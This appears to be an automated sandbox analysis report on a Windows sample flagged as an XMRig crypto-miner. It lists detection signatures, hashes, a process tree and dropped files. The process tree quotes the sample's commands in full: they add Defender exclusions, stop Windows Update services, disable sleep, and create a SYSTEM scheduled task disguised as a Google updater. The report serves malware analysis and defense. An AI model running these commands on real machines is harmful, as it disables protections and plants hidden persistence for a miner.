Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/07/2023, 21:37

General

  • Target

    file.exe

  • Size

    5.6MB

  • MD5

    56270856311af456a2d0216129d8daf5

  • SHA1

    c0fff6d6a9fda4b7086422efa1e4b1fa3e3258c6

  • SHA256

    f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830

  • SHA512

    85d54f7d60203adad5e229a1c5a8abff92bd1a27fcf823933aa5a8d8b4d4c28d36285a0f09d1874a4fab27330ca9394c0cdc1140c8ebe398dbc47b34555d1f86

  • SSDEEP

    98304:PyPCWkFm5sbtLInk76Wbe02hQsvPDVXl5nJWt+1iYD8QR6nPQ6E3CzhSmHoaxsmS:PiCpm5uINjPDVXDnJ9ik82qPQNEhSmHG

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 11 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:436
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2444
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4480
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3216
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:520
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:4464
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:4312
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:1308
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:3336
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:232
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3368
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3044
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1944
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3480
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hnwthdb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3820
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:2484
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:2044
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2368
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:772
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:3236
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:4404
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:4776
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:3720
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4052
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
              PID:4752
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
                PID:2992
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                  PID:2656
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                    PID:1504
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hnwthdb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4316
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe
                  2⤵
                    PID:2188
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:548
                • C:\Program Files\Google\Chrome\updater.exe
                  "C:\Program Files\Google\Chrome\updater.exe"
                  1⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:4060

                Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Program Files\Google\Chrome\updater.exe

                        Filesize

                        5.6MB

                        MD5

                        56270856311af456a2d0216129d8daf5

                        SHA1

                        c0fff6d6a9fda4b7086422efa1e4b1fa3e3258c6

                        SHA256

                        f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830

                        SHA512

                        85d54f7d60203adad5e229a1c5a8abff92bd1a27fcf823933aa5a8d8b4d4c28d36285a0f09d1874a4fab27330ca9394c0cdc1140c8ebe398dbc47b34555d1f86

                      • C:\Program Files\Google\Chrome\updater.exe

                        Filesize

                        5.6MB

                        MD5

                        56270856311af456a2d0216129d8daf5

                        SHA1

                        c0fff6d6a9fda4b7086422efa1e4b1fa3e3258c6

                        SHA256

                        f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830

                        SHA512

                        85d54f7d60203adad5e229a1c5a8abff92bd1a27fcf823933aa5a8d8b4d4c28d36285a0f09d1874a4fab27330ca9394c0cdc1140c8ebe398dbc47b34555d1f86

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        d85ba6ff808d9e5444a4b369f5bc2730

                        SHA1

                        31aa9d96590fff6981b315e0b391b575e4c0804a

                        SHA256

                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                        SHA512

                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        944B

                        MD5

                        62623d22bd9e037191765d5083ce16a3

                        SHA1

                        4a07da6872672f715a4780513d95ed8ddeefd259

                        SHA256

                        95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                        SHA512

                        9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f1mqz4i4.lcm.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Windows\System32\drivers\etc\hosts

                        Filesize

                        3KB

                        MD5

                        00930b40cba79465b7a38ed0449d1449

                        SHA1

                        4b25a89ee28b20ba162f23772ddaf017669092a5

                        SHA256

                        eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

                        SHA512

                        cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        4KB

                        MD5

                        bdb25c22d14ec917e30faf353826c5de

                        SHA1

                        6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                        SHA256

                        e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                        SHA512

                        b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        b42c70c1dbf0d1d477ec86902db9e986

                        SHA1

                        1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                        SHA256

                        8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                        SHA512

                        57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                      • memory/548-248-0x0000000011F40000-0x0000000011F60000-memory.dmp

                        Filesize

                        128KB

                      • memory/548-246-0x00007FF65E6A0000-0x00007FF65EE8F000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/548-252-0x00007FF65E6A0000-0x00007FF65EE8F000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/548-250-0x00007FF65E6A0000-0x00007FF65EE8F000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/548-256-0x00007FF65E6A0000-0x00007FF65EE8F000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/548-247-0x00000000016C0000-0x00000000016E0000-memory.dmp

                        Filesize

                        128KB

                      • memory/548-258-0x00007FF65E6A0000-0x00007FF65EE8F000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/548-254-0x00007FF65E6A0000-0x00007FF65EE8F000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/548-244-0x0000000011F40000-0x0000000011F60000-memory.dmp

                        Filesize

                        128KB

                      • memory/548-243-0x00000000016C0000-0x00000000016E0000-memory.dmp

                        Filesize

                        128KB

                      • memory/548-242-0x00007FF65E6A0000-0x00007FF65EE8F000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/548-240-0x0000000011E00000-0x0000000011E40000-memory.dmp

                        Filesize

                        256KB

                      • memory/548-239-0x0000000001640000-0x0000000001660000-memory.dmp

                        Filesize

                        128KB

                      • memory/548-260-0x00007FF65E6A0000-0x00007FF65EE8F000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/548-262-0x00007FF65E6A0000-0x00007FF65EE8F000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/548-264-0x00007FF65E6A0000-0x00007FF65EE8F000-memory.dmp

                        Filesize

                        7.9MB

                      • memory/2044-201-0x000001472D210000-0x000001472D21A000-memory.dmp

                        Filesize

                        40KB

                      • memory/2044-198-0x000001472D220000-0x000001472D23A000-memory.dmp

                        Filesize

                        104KB

                      • memory/2044-199-0x000001472D1D0000-0x000001472D1D8000-memory.dmp

                        Filesize

                        32KB

                      • memory/2044-200-0x000001472D200000-0x000001472D206000-memory.dmp

                        Filesize

                        24KB

                      • memory/2044-192-0x000001472CF90000-0x000001472CFAC000-memory.dmp

                        Filesize

                        112KB

                      • memory/2044-202-0x000001472AB50000-0x000001472AB60000-memory.dmp

                        Filesize

                        64KB

                      • memory/2044-194-0x00007FF4383F0000-0x00007FF438400000-memory.dmp

                        Filesize

                        64KB

                      • memory/2044-196-0x000001472D1C0000-0x000001472D1CA000-memory.dmp

                        Filesize

                        40KB

                      • memory/2044-195-0x000001472D1E0000-0x000001472D1FC000-memory.dmp

                        Filesize

                        112KB

                      • memory/2044-193-0x000001472D070000-0x000001472D07A000-memory.dmp

                        Filesize

                        40KB

                      • memory/2044-182-0x000001472AB50000-0x000001472AB60000-memory.dmp

                        Filesize

                        64KB

                      • memory/2044-181-0x000001472AB50000-0x000001472AB60000-memory.dmp

                        Filesize

                        64KB

                      • memory/2044-180-0x000001472AB50000-0x000001472AB60000-memory.dmp

                        Filesize

                        64KB

                      • memory/2188-241-0x00007FF644840000-0x00007FF64486A000-memory.dmp

                        Filesize

                        168KB

                      • memory/2188-249-0x00007FF644840000-0x00007FF64486A000-memory.dmp

                        Filesize

                        168KB

                      • memory/2444-168-0x00007FF6A9070000-0x00007FF6A9611000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/2444-133-0x00007FF6A9070000-0x00007FF6A9611000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/3820-165-0x000001F16FF50000-0x000001F16FF60000-memory.dmp

                        Filesize

                        64KB

                      • memory/3820-163-0x000001F16FF50000-0x000001F16FF60000-memory.dmp

                        Filesize

                        64KB

                      • memory/3820-162-0x000001F16FF50000-0x000001F16FF60000-memory.dmp

                        Filesize

                        64KB

                      • memory/3820-164-0x000001F16FF50000-0x000001F16FF60000-memory.dmp

                        Filesize

                        64KB

                      • memory/4060-197-0x00007FF7EF1B0000-0x00007FF7EF751000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/4060-238-0x00007FF7EF1B0000-0x00007FF7EF751000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/4060-170-0x00007FF7EF1B0000-0x00007FF7EF751000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/4316-229-0x0000012A73DE0000-0x0000012A73DF0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4316-227-0x0000012A73DE0000-0x0000012A73DF0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4316-228-0x0000012A73DE0000-0x0000012A73DF0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4316-230-0x00007FF40BC10000-0x00007FF40BC20000-memory.dmp

                        Filesize

                        64KB

                      • memory/4316-231-0x0000012A73DE0000-0x0000012A73DF0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4316-233-0x0000012A73DE9000-0x0000012A73DEF000-memory.dmp

                        Filesize

                        24KB

                      • memory/4480-147-0x000001378FDA0000-0x000001378FDB0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4480-146-0x000001378FDA0000-0x000001378FDB0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4480-145-0x000001378FDA0000-0x000001378FDB0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4480-144-0x000001378FDA0000-0x000001378FDB0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4480-134-0x000001378FD70000-0x000001378FD92000-memory.dmp

                        Filesize

                        136KB